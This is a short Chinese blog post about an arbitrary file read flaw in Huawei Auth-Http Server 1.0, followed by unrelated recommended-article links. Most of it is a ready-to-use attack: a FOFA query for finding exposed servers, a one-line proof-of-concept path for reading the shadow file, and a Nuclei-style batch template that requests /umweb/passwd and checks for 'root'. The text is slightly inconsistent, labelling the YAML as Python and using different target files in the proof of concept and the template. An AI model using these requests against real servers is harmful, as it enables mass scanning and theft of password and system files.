华为Auth-Http Serve任意文件读取

1.漏洞描述

华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。

2.网络资产查找

FOFA:server="Huawei Auth-Http Server 1.0"

2、部分界面如下

3、Poc

/umweb/shadow

4、Poc批量验证

python 复制代码
id: huanwei-auth-http-server-fileread

info:
name: 华为Auth-Http Server 1.0任意文件读取
author:
severity: medium
description: 华为Auth-Http Server 1.0任意文件读取,攻击者可通过此漏洞获取敏感信息。

reference:
- https://
metadata:
fofa-query: server="Huawei Auth-Http Server 1.0"
verified: true
max-request: 1

http:
- raw:
- |
GET /umweb/passwd HTTP/1.1
Host: {{Hostname}}


matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"root")'
相关推荐
lucybean015 分钟前
抗老化曝气管采购:主流品牌优劣及选型策略深度解析
运维
come112349 分钟前
剪映零基础教程
java·linux·运维
瀚高PG实验室22 分钟前
HAC 集群主节点状态在starting、running之间频繁切换
运维·数据库·postgresql·瀚高数据库
其实防守也摸鱼27 分钟前
教育信息技术应用创新---基础软件信息赛
运维·服务器·数据库·github·copilot
苏生Susheng35 分钟前
【软件实施】Windows 服务器运维实战
java·运维·服务器·windows·spring boot·javaweb·实施
且白38 分钟前
node、npm通过http-server架设本地服务器(可解决跨域)
服务器·网络协议·http
Gauss松鼠会1 小时前
【GaussDB】GaussDB 组件、节点和AZ故障仲裁与切换流程
运维·服务器·数据库·gaussdb
库玛西1 小时前
深入浅出Linux select网络模型:从底层位图原理到C++面向对象高级封装
linux·服务器·网络·c++·ubuntu
Tingjct1 小时前
线程详细讲解---聚焦linux
linux·服务器·jvm
数字孪生视频孪生1 小时前
空间智能技术|跨镜轨迹全域可溯,无感定位无扰赋能落地
大数据·运维·人工智能·重构·架构